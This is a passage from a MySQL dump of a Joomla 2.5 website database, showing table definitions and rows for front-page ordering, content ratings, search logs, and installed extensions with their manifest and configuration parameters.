117),(271,116),(272,115),(273,114),(274,113),(275,112),(276,111),(277,110),(278,109),(279,108),(280,107),(281,106),(282,105),(283,104),(284,103),(285,102),(286,101),(287,100),(288,99),(289,98),(290,97),(291,96),(292,95),(293,72),(294,94),(295,93),(296,92),(297,91),(298,90),(299,89),(300,88),(301,87),(302,86),(303,85),(304,84),(307,83),(308,82),(310,81),(311,80),(312,79),(313,78),(314,77),(315,76),(316,75),(317,74),(318,73),(322,71),(323,70),(324,69),(325,68),(326,67),(327,66),(328,65),(329,64),(331,63),(332,62),(333,61),(334,60),(335,59),(336,58),(337,57),(338,56),(339,55),(340,54),(341,53),(342,52),(343,51),(344,50),(345,49),(346,48),(347,47),(348,46),(349,45),(350,44),(351,43),(352,42),(353,41),(354,40),(355,39),(356,38),(357,37),(358,36),(359,35),(360,34),(361,33),(362,32),(363,31),(364,30),(365,29),(366,28),(367,27),(368,26),(369,25),(370,24),(371,23),(372,22),(373,21),(374,20),(375,19),(378,18),(379,17),(380,16),(381,15),(382,14),(383,13),(384,12),(385,11),(386,10),(387,9),(388,8),(389,7),(392,6),(393,5),(394,4),(395,3),(396,2),(397,1);
/*!40000 ALTER TABLE `xyhmu_content_frontpage` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `xyhmu_content_rating`
--

DROP TABLE IF EXISTS `xyhmu_content_rating`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `xyhmu_content_rating` (
  `content_id` int(11) NOT NULL DEFAULT '0',
  `rating_sum` int(10) unsigned NOT NULL DEFAULT '0',
  `rating_count` int(10) unsigned NOT NULL DEFAULT '0',
  `lastip` varchar(50) NOT NULL DEFAULT '',
  PRIMARY KEY (`content_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `xyhmu_content_rating`
--

LOCK TABLES `xyhmu_content_rating` WRITE;
/*!40000 ALTER TABLE `xyhmu_content_rating` DISABLE KEYS */;
/*!40000 ALTER TABLE `xyhmu_content_rating` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `xyhmu_core_log_searches`
--

DROP TABLE IF EXISTS `xyhmu_core_log_searches`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `xyhmu_core_log_searches` (
  `search_term` varchar(128) NOT NULL DEFAULT '',
  `hits` int(10) unsigned NOT NULL DEFAULT '0'
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `xyhmu_core_log_searches`
--

LOCK TABLES `xyhmu_core_log_searches` WRITE;
/*!40000 ALTER TABLE `xyhmu_core_log_searches` DISABLE KEYS */;
/*!40000 ALTER TABLE `xyhmu_core_log_searches` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `xyhmu_extensions`
--

DROP TABLE IF EXISTS `xyhmu_extensions`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `xyhmu_extensions` (
  `extension_id` int(11) NOT NULL AUTO_INCREMENT,
  `name` varchar(100) NOT NULL,
  `type` varchar(20) NOT NULL,
  `element` varchar(100) NOT NULL,
  `folder` varchar(100) NOT NULL,
  `client_id` tinyint(3) NOT NULL,
  `enabled` tinyint(3) NOT NULL DEFAULT '1',
  `access` int(10) unsigned NOT NULL DEFAULT '1',
  `protected` tinyint(3) NOT NULL DEFAULT '0',
  `manifest_cache` text NOT NULL,
  `params` text NOT NULL,
  `custom_data` text NOT NULL,
  `system_data` text NOT NULL,
  `checked_out` int(10) unsigned NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `ordering` int(11) DEFAULT '0',
  `state` int(11) DEFAULT '0',
  PRIMARY KEY (`extension_id`),
  KEY `element_clientid` (`element`,`client_id`),
  KEY `element_folder_clientid` (`element`,`folder`,`client_id`),
  KEY `extension` (`type`,`element`,`folder`,`client_id`)
) ENGINE=MyISAM AUTO_INCREMENT=10107 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `xyhmu_extensions`
--

LOCK TABLES `xyhmu_extensions` WRITE;
/*!40000 ALTER TABLE `xyhmu_extensions` DISABLE KEYS */;
INSERT INTO `xyhmu_extensions` VALUES (1,'com_mailto','component','com_mailto','',0,1,1,1,'{\"legacy\":false,\"name\":\"com_mailto\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2013 Open Source Matters. All rights reserved.\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"COM_MAILTO_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(2,'com_wrapper','component','com_wrapper','',0,1,1,1,'{\"legacy\":false,\"name\":\"com_wrapper\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2013 Open Source Matters. All rights reserved.\\n\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"COM_WRAPPER_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(3,'com_admin','component','com_admin','',1,1,1,1,'{\"legacy\":false,\"name\":\"com_admin\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2013 Open Source Matters. All rights reserved.\\n\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"COM_ADMIN_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(4,'com_banners','component','com_banners','',1,1,1,0,'{\"legacy\":false,\"name\":\"com_banners\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2013 Open Source Matters. All rights reserved.\\n\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"COM_BANNERS_XML_DESCRIPTION\",\"group\":\"\"}','{\"purchase_type\":\"3\",\"track_impressions\":\"0\",\"track_clicks\":\"0\",\"metakey_prefix\":\"\"}','','',0,'0000-00-00 00:00:00',0,0),(5,'com_cache','component','com_cache','',1,1,1,1,'{\"legacy\":false,\"name\":\"com_cache\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2013 Open Source Matters. All rights reserved.\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"COM_CACHE_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(6,'com_categories','component','com_categories','',1,1,1,1,'{\"legacy\":false,\"name\":\"com_categories\",\"type\":\"component\",\"creationDate\":\"December 2007\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2013 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"COM_CATEGORIES_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(7,'com_checkin','component','com_checkin','',1,1,1,1,'{\"legacy\":false,\"name\":\"com_checkin\",\"type\":\"component\",\"creationDate\":\"Unknown\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2008 Open Source Matters. All rights reserved.\\n\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"COM_CHECKIN_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(8,'com_contact','component','com_contact','',1,1,1,0,'{\"legacy\":false,\"name\":\"com_contact\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2013 Open Source Matters. All rights reserved.\\n\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"COM_CONTACT_XML_DESCRIPTION\",\"group\":\"\"}','{\"show_contact_category\":\"hide\",\"show_contact_list\":\"0\",\"presentation_style\":\"sliders\",\"show_name\":\"1\",\"show_position\":\"1\",\"show_email\":\"0\",\"show_street_address\":\"1\",\"show_suburb\":\"1\",\"show_state\":\"1\",\"show_postcode\":\"1\",\"show_country\":\"1\",\"show_telephone\":\"1\",\"show_mobile\":\"1\",\"show_fax\":\"1\",\"show_webpage\":\"1\",\"show_misc\":\"1\",\"show_image\":\"1\",\"image\":\"\",\"allow_vcard\":\"0\",\"show_articles\":\"0\",\"show_profile\":\"0\",\"show_links\":\"0\",\"linka_name\":\"\",\"linkb_name\":\"\",\"linkc_name\":\"\",\"linkd_name\":\"\",\"linke_name\":\"\",\"contact_icons\":\"0\",\"icon_address\":\"\",\"icon_email\":\"\",\"icon_telephone\":\"\",\"icon_mobile\":\"\",\"icon_fax\":\"\",\"icon_misc\":\"\",\"show_headings\":\"1\",\"show_position_headings\":\"1\",\"show_email_headings\":\"0\",\"show_telephone_headings\":\"1\",\"show_mobile_headings\":\"0\",\"show_fax_headings\":\"0\",\"allow_vcard_headings\":\"0\",\"show_suburb_headings\":\"1\",\"show_state_headings\":\"1\",\"show_country_headings\":\"1\",\"show_email_form\":\"1\",\"show_email_copy\":\"1\",\"banned_email\":\"\",\"banned_subject\":\"\",\"banned_text\":\"\",\"validate_session\":\"1\",\"custom_reply\":\"0\",\"redirect\":\"\",\"show_category_crumb\":\"0\",\"metakey\":\"\",\"metadesc\":\"\",\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}','','',0,'0000-00-00 00:00:00',0,0),(9,'com_cpanel','component','com_cpanel','',1,1,1,1,'{\"legacy\":false,\"name\":\"com_cpanel\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2013 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"COM_CPANEL_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(10,'com_installer','component','com_installer','',1,1,1,1,'{\"legacy\":false,\"name\":\"com_installer\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2013 Open Source Matters. All rights reserved.\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"COM_INSTALLER_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(11,'com_languages','component','com_languages','',1,1,1,1,'{\"legacy\":false,\"name\":\"com_languages\",\"type\":\"component\",\"creationDate\":\"2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2013 Open Source Matters. All rights reserved.\\n\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"COM_LANGUAGES_XML_DESCRIPTION\",\"group\":\"\"}','{\"administrator\":\"en-GB\",\"site\":\"lt-LT\"}','','',0,'0000-00-00 00:00:00',0,0),(12,'com_login','component','com_login','',1,1,1,1,'{\"legacy\":false,\"name\":\"com_login\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2013 Open Source Matters. All rights reserved.\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"COM_LOGIN_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(13,'com_media','component','com_media','',1,1,0,1,'{\"legacy\":false,\"name\":\"com_media\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2013 Open Source Matters. All rights reserved.\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"COM_MEDIA_XML_DESCRIPTION\",\"group\":\"\"}','{\"upload_extensions\":\"bmp,csv,doc,gif,ico,jpg,jpeg,odg,odp,ods,odt,pdf,png,ppt,swf,txt,xcf,xls,BMP,CSV,DOC,GIF,ICO,JPG,JPEG,ODG,ODP,ODS,ODT,PDF,PNG,PPT,SWF,TXT,XCF,XLS\",\"upload_maxsize\":\"10\",\"file_path\":\"images\",\"image_path\":\"images\",\"restrict_uploads\":\"1\",\"allowed_media_usergroup\":\"3\",\"check_mime\":\"1\",\"image_extensions\":\"bmp,gif,jpg,png\",\"ignore_extensions\":\"\",\"upload_mime\":\"image\\/jpeg,image\\/gif,image\\/png,image\\/bmp,application\\/x-shockwave-flash,application\\/msword,application\\/excel,application\\/pdf,application\\/powerpoint,text\\/plain,application\\/x-zip\",\"upload_mime_illegal\":\"text\\/html\",\"enable_flash\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0),(14,'com_menus','component','com_menus','',1,1,1,1,'{\"legacy\":false,\"name\":\"com_menus\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2013 Open Source Matters. All rights reserved.\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"COM_MENUS_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(15,'com_messages','component','com_messages','',1,1,1,1,'{\"legacy\":false,\"name\":\"com_messages\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2013 Open Source Matters. All rights reserved.\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"COM_MESSAGES_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(16,'com_modules','component','com_modules','',1,1,1,1,'{\"legacy\":false,\"name\":\"com_modules\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2013 Open Source Matters. All rights reserved.\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"COM_MODULES_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(17,'com_newsfeeds','component','com_newsfeeds','',1,1,1,0,'{\"legacy\":false,\"name\":\"com_newsfeeds\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2013 Open Source Matters. All rights reserved.\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"COM_NEWSFEEDS_XML_DESCRIPTION\",\"group\":\"\"}','{\"show_feed_image\":\"1\",\"show_feed_description\":\"1\",\"show_item_description\":\"1\",\"feed_word_count\":\"0\",\"show_headings\":\"1\",\"show_name\":\"1\",\"show_articles\":\"0\",\"show_link\":\"1\",\"show_description\":\"1\",\"show_description_image\":\"1\",\"display_num\":\"\",\"show_pagination_limit\":\"1\",\"show_pagination\":\"1\",\"show_pagination_results\":\"1\",\"show_cat_items\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(18,'com_plugins','component','com_plugins','',1,1,1,1,'{\"legacy\":false,\"name\":\"com_plugins\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2013 Open Source Matters. All rights reserved.\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"COM_PLUGINS_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(19,'com_search','component','com_search','',1,1,1,1,'{\"legacy\":false,\"name\":\"com_search\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2013 Open Source Matters. All rights reserved.\\n\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"COM_SEARCH_XML_DESCRIPTION\",\"group\":\"\"}','{\"enabled\":\"0\",\"show_date\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(20,'com_templates','component','com_templates','',1,1,1,1,'{\"legacy\":false,\"name\":\"com_templates\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2013 Open Source Matters. All rights reserved.\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"COM_TEMPLATES_XML_DESCRIPTION\",\"group\":\"\"}','{\"template_positions_display\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(21,'com_weblinks','component','com_weblinks','',1,1,1,0,'{\"legacy\":false,\"name\":\"com_weblinks\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2013 Open Source Matters. All rights reserved.\\n\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"COM_WEBLINKS_XML_DESCRIPTION\",\"group\":\"\"}','{\"show_comp_description\":\"1\",\"comp_description\":\"\",\"show_link_hits\":\"1\",\"show_link_description\":\"1\",\"show_other_cats\":\"0\",\"show_headings\":\"0\",\"show_numbers\":\"0\",\"show_report\":\"1\",\"count_clicks\":\"1\",\"target\":\"0\",\"link_icons\":\"\"}','','',0,'0000-00-00 00:00:00',0,0),(22,'com_content','component','com_content','',1,1,0,1,'{\"legacy\":false,\"name\":\"com_content\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2013 Open Source Matters. All rights reserved.\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"COM_CONTENT_XML_DESCRIPTION\",\"group\":\"\"}','{\"article_layout\":\"_:default\",\"show_title\":\"1\",\"link_titles\":\"1\",\"show_intro\":\"1\",\"show_category\":\"0\",\"link_category\":\"0\",\"show_parent_category\":\"0\",\"link_parent_category\":\"0\",\"show_author\":\"0\",\"link_author\":\"0\",\"show_create_date\":\"0\",\"show_modify_date\":\"0\",\"show_publish_date\":\"0\",\"show_item_navigation\":\"0\",\"show_vote\":\"0\",\"show_readmore\":\"1\",\"show_readmore_title\":\"1\",\"readmore_limit\":\"100\",\"show_icons\":\"0\",\"show_print_icon\":\"0\",\"show_email_icon\":\"0\",\"show_hits\":\"0\",\"show_noauth\":\"0\",\"urls_position\":\"0\",\"show_publishing_options\":\"1\",\"show_article_options\":\"1\",\"show_urls_images_frontend\":\"0\",\"show_urls_images_backend\":\"1\",\"targeta\":0,\"targetb\":0,\"targetc\":0,\"float_intro\":\"left\",\"float_fulltext\":\"left\",\"category_layout\":\"_:blog\",\"show_category_heading_title_text\":\"1\",\"show_category_title\":\"0\",\"show_description\":\"0\",\"show_description_image\":\"0\",\"maxLevel\":\"1\",\"show_empty_categories\":\"0\",\"show_no_articles\":\"1\",\"show_subcat_desc\":\"1\",\"show_cat_num_articles\":\"0\",\"show_base_description\":\"1\",\"maxLevelcat\":\"-1\",\"show_empty_categories_cat\":\"0\",\"show_subcat_desc_cat\":\"1\",\"show_cat_num_articles_cat\":\"1\",\"num_leading_articles\":\"1\",\"num_intro_articles\":\"4\",\"num_columns\":\"2\",\"num_links\":\"4\",\"multi_column_order\":\"0\",\"show_subcategory_content\":\"0\",\"show_pagination_limit\":\"1\",\"filter_field\":\"hide\",\"show_headings\":\"1\",\"list_show_date\":\"0\",\"date_format\":\"\",\"list_show_hits\":\"1\",\"list_show_author\":\"1\",\"orderby_pri\":\"order\",\"orderby_sec\":\"rdate\",\"order_date\":\"published\",\"show_pagination\":\"2\",\"show_pagination_results\":\"1\",\"show_feed_link\":\"1\",\"feed_summary\":\"0\",\"feed_show_readmore\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0),(23,'com_config','component','com_config','',1,1,0,1,'{\"legacy\":false,\"name\":\"com_config\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2013 Open Source Matters. All rights reserved.\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"COM_CONFIG_XML_DESCRIPTION\",\"group\":\"\"}','{\"filters\":{\"1\":{\"filter_type\":\"NH\",\"filter_tags\":\"\",\"filter_attributes\":\"\"},\"6\":{\"filter_type\":\"BL\",\"filter_tags\":\"\",\"filter_attributes\":\"\"},\"7\":{\"filter_type\":\"NONE\",\"filter_tags\":\"\",\"filter_attributes\":\"\"},\"2\":{\"filter_type\":\"NH\",\"filter_tags\":\"\",\"filter_attributes\":\"\"},\"3\":{\"filter_type\":\"BL\",\"filter_tags\":\"\",\"filter_attributes\":\"\"},\"4\":{\"filter_type\":\"BL\",\"filter_tags\":\"\",\"filter_attributes\":\"\"},\"5\":{\"filter_type\":\"BL\",\"filter_tags\":\"\",\"filter_attributes\":\"\"},\"8\":{\"filter_type\":\"NONE\",\"filter_tags\":\"\",\"filter_attributes\":\"\"}}}','','',0,'0000-00-00 00:00:00',0,0),(24,'com_redirect','component','com_redirect','',1,1,0,1,'{\"legacy\":false,\"name\":\"com_redirect\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2013 Open Source Matters. All rights reserved.\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"COM_REDIRECT_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(25,'com_users','component','com_users','',1,1,0,1,'{\"legacy\":false,\"name\":\"com_users\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2013 Open Source Matters. All rights reserved.\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"COM_USERS_XML_DESCRIPTION\",\"group\":\"\"}','{\"allowUserRegistration\":\"1\",\"new_usertype\":\"2\",\"useractivation\":\"1\",\"frontend_userparams\":\"1\",\"mailSubjectPrefix\":\"\",\"mailBodySuffix\":\"\"}','','',0,'0000-00-00 00:00:00',0,0),(27,'com_finder','component','com_finder','',1,1,0,0,'{\"legacy\":false,\"name\":\"com_finder\",\"type\":\"component\",\"creationDate\":\"August 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2012 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"COM_FINDER_XML_DESCRIPTION\",\"group\":\"\"}','{\"show_description\":\"1\",\"description_length\":255,\"allow_empty_query\":\"0\",\"show_url\":\"1\",\"show_advanced\":\"1\",\"expand_advanced\":\"0\",\"show_date_filters\":\"0\",\"highlight_terms\":\"1\",\"opensearch_name\":\"\",\"opensearch_description\":\"\",\"batch_size\":\"50\",\"memory_table_limit\":30000,\"title_multiplier\":\"1.7\",\"text_multiplier\":\"0.7\",\"meta_multiplier\":\"1.2\",\"path_multiplier\":\"2.0\",\"misc_multiplier\":\"0.3\",\"stemmer\":\"snowball\"}','','',0,'0000-00-00 00:00:00',0,0),(28,'com_joomlaupdate','component','com_joomlaupdate','',1,1,0,1,'{\"legacy\":false,\"name\":\"com_joomlaupdate\",\"type\":\"component\",\"creationDate\":\"February 2012\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2012 Open Source Matters. All rights reserved.\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"COM_JOOMLAUPDATE_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(100,'PHPMailer','library','phpmailer','',0,1,1,1,'{\"legacy\":false,\"name\":\"PHPMailer\",\"type\":\"library\",\"creationDate\":\"2001\",\"author\":\"PHPMailer\",\"copyright\":\"(c) 2001-2003, Brent R. Matzelle, (c) 2004-2009, Andy Prevost. All Rights Reserved., (c) 2010-2011, Jim Jagielski. All Rights Reserved.\",\"authorEmail\":\"jimjag@gmail.com\",\"authorUrl\":\"https:\\/\\/code.google.com\\/a\\/apache-extras.org\\/p\\/phpmailer\\/\",\"version\":\"5.2\",\"description\":\"LIB_PHPMAILER_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(101,'SimplePie','library','simplepie','',0,1,1,1,'{\"legacy\":false,\"name\":\"SimplePie\",\"type\":\"library\",\"creationDate\":\"2004\",\"author\":\"SimplePie\",\"copyright\":\"Copyright (c) 2004-2009, Ryan Parman and Geoffrey Sneddon\",\"authorEmail\":\"\",\"authorUrl\":\"http:\\/\\/simplepie.org\\/\",\"version\":\"1.2\",\"description\":\"LIB_SIMPLEPIE_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(102,'phputf8','library','phputf8','',0,1,1,1,'{\"legacy\":false,\"name\":\"phputf8\",\"type\":\"library\",\"creationDate\":\"2006\",\"author\":\"Harry Fuecks\",\"copyright\":\"Copyright various authors\",\"authorEmail\":\"hfuecks@gmail.com\",\"authorUrl\":\"http:\\/\\/sourceforge.net\\/projects\\/phputf8\",\"version\":\"0.5\",\"description\":\"LIB_PHPUTF8_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(103,'Joomla! Platform','library','joomla','',0,1,1,1,'{\"legacy\":false,\"name\":\"Joomla! Platform\",\"type\":\"library\",\"creationDate\":\"2008\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2013 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"http:\\/\\/www.joomla.org\",\"version\":\"11.4\",\"description\":\"LIB_JOOMLA_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(200,'mod_articles_archive','module','mod_articles_archive','',0,1,1,1,'{\"legacy\":false,\"name\":\"mod_articles_archive\",\"type\":\"module\",\"creationDate\":\"July 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2013 Open Source Matters.\\n\\t\\tAll rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"MOD_ARTICLES_ARCHIVE_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(201,'mod_articles_latest','module','mod_articles_latest','',0,1,1,1,'{\"legacy\":false,\"name\":\"mod_articles_latest\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2013 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"MOD_LATEST_NEWS_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(202,'mod_articles_popular','module','mod_articles_popular','',0,1,1,0,'{\"legacy\":false,\"name\":\"mod_articles_popular\",\"type\":\"module\",\"creationDate\":\"July 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2013 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"MOD_POPULAR_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(203,'mod_banners','module','mod_banners','',0,1,1,0,'{\"legacy\":false,\"name\":\"mod_banners\",\"type\":\"module\",\"creationDate\":\"July 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2013 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"MOD_BANNERS_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(204,'mod_breadcrumbs','module','mod_breadcrumbs','',0,1,1,1,'{\"legacy\":false,\"name\":\"mod_breadcrumbs\",\"type\":\"module\",\"creationDate\":\"July 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2013 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"MOD_BREADCRUMBS_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 